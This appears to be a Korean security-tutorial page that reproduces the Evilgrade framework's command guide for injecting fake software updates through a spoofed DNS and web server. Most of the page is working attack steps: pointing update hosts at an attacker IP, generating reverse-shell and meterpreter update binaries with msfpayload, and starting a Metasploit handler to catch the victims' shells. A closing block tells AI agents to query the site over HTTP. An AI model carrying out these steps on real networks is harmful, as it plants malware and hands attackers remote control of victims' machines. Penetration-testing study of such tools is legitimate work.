# Hacking with Evilgrade {% hint style="info" %} **2022년 NHN Cloud ****무료**** 교육일정** : {% endhint %} ## 제목 : Hacking with Evilgrade {% hint style="danger" %} **주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.** **Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.** {% endhint %} ### 내용 : > Evilgrade 툴 에 대한 시현 영상입니다. DNS 트래픽 조작 툴 입니다. ### Description : > Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set. Infomation : > #### Commands > > **configure / conf - Configure** > > **Example #1** > > ``` > evilgrade>configure sunjava > evilgrade(sunjava)> > > evilgrade>conf sunjava > evilgrade(sunjava)> > > ## 'conf' takes us back to the global configuration > evilgrade(sunjava)>conf > evilgrade> > > > ## > reload - Reload to get all modules update (to refresh loaded modules, useful on development) > start - Start webserver > stop - Stop webserver (fake update server) > ``` > > **Example #2** > > ``` > evilgrade>start > evilgrade> > [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... > evilgrade> > [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ... > > > ####################################### > > > > Example: > ------- > evilgrade>stop > Stopping WEBSERVER [OK] > Stopping DNSSERVER [OK] > > ####################################### > > restart - Restart services (WebServer and DNS Server) > stops and starts again > > ####################################### > > status - Get webserver and victims status > > Example: > ------- > evilgrade>show status > Webserver (pid 4134) already running > > Users status: > ============ > > .---------------------------------------------------------------------------------------------------------------. > | Client | Module | Status | Md5,Cmd,File | > +----------------+------------------+--------+------------------------------------------------------------------+ > | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | > '----------------+------------------+--------+------------------------------------------------------------------' > > ####################################### > > show - Display information of . > > ####################################### > > show active - Display active modules in the webserver > > ####################################### > > show modules - Display implemented modules > > ######################################### > > show options - Display modules/global options > > Example: > ------- > > evilgrade>show options > > Display options: > =============== > > .-----------------------------------------------------------------------------------. > | Name | Default | Description | > +-------------+-----------+---------------------------------------------------------+ > | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | > | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | > | DNSPort | 53 | Listen Name Server port | > | debug | 1 | Debug mode | > | port | 80 | Webserver listening port | > | sslport | 443 | Webserver SSL listening port | > '-------------+-----------+---------------------------------------------------------' > > evilgrade> > evilgrade(notepadplus)>conf vmware > evilgrade(vmware)>show options (without started services) > > Display options: > =============== > > Name = VMware Server > Version = 1.0 > Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] > Description = "" > VirtualHost = "www.vmware.com" > > .----------------------------------------------. > | Name | Default | Description | > +--------+-------------------+-----------------+ > | enable | 1 | Status | > | agent | ./agent/agent.exe | Agent to inject | > '--------+-------------------+-----------------' > > evilgrade(vmware)>show options (with started services after setting agent) > > Display options: > =============== > > Name = VMware Server > Version = 1.0 > Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] > Description = "" > VirtualHost = "www.vmware.com" > > .--------------------------------------------------------------------------------------------------. > | Name | Default | Description | > +-------------+------------------------------------------------------------------+-----------------+ > | enable | 1 | Status | > | agentmd5 | f80af637642170507bda998b6f2015fa | | > | agentsize | 54576 | | > | agent | ./agent/agent.exe | Agent to inject | > | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | | > '-------------+------------------------------------------------------------------+-----------------' > > > ######################################### > > set - Configure variables global or modules > > Example: > ------- > > evilgrade>show options > > > Display options: > =============== > > .-----------------------------------------------------------------------------------. > | Name | Default | Description | > +-------------+-----------+---------------------------------------------------------+ > | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | > | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | > | DNSPort | 53 | Listen Name Server port | > | debug | 0 | Debug mode | > | port | 80 | Webserver listening port | > | sslport | 443 | Webserver SSL listening port | > '-------------+-----------+---------------------------------------------------------' > > ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4) > > evilgrade>set debug 1 #Enable debug > set debug, 1 > > evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening > set DNSAnswerIp, 192.168.1.4 > > evilgrade>show options > > Display options: > =============== > > .-------------------------------------------------------------------------------------. > | Name | Default | Description | > +-------------+-------------+---------------------------------------------------------+ > | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | > | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) | > | DNSPort | 53 | Listen Name Server port | > | debug | 1 | Debug mode | > | port | 80 | Webserver listening port | > | sslport | 443 | Webserver SSL listening port | > '-------------+-------------+---------------------------------------------------------' > > > ############################### > > exit - exits the program > > ####################################### > > help - prints this screen, or help on 'command' > > ####################################### > ``` > > **Advance** > > * Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation. > > **Example #1-1** > > ``` > evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]' > ``` > > In this case for every required update binary we generate a fake update binary with the payload "windows/shell\_reverse\_tcp" using a reverse shell to connect at address 192.168.233.2 port 4141. The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated. Evilgrade detects the usage of "dynamic fake update binary feature" due to having a sentence between squared brackets '\[]' Inside that brackets we have a string that is also between brackets "" that is compiled using perl. > > For example if we use: > > ``` > evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]' > ``` > > then every time we get a binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" generating different agents. > > An easy alternative, but not dynamically, could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module. > > **Example #1-2** > > (Outside evilgrade) > > ``` > [team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe > ``` > > (Inside evilgrade) > > ``` > evilgrade(sunjava)>set agent /tmp/reverse-shell.exe > ``` > > After our payload was generated, we leave a multi handler listening on the previously assigned LHOST. > > (Outside evilgrade) > > ``` > [team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E > [*] Started reverse handler on 192.168.100.2:4444 > [*] Starting the payload handler... > ``` {% embed url="" %} 시연 영상 {% endembed %} {% hint style="info" %} **2022년 NHN Cloud ****무료**** 교육일정** : {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sec.skill.or.kr/hacking/evilgrade-hacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.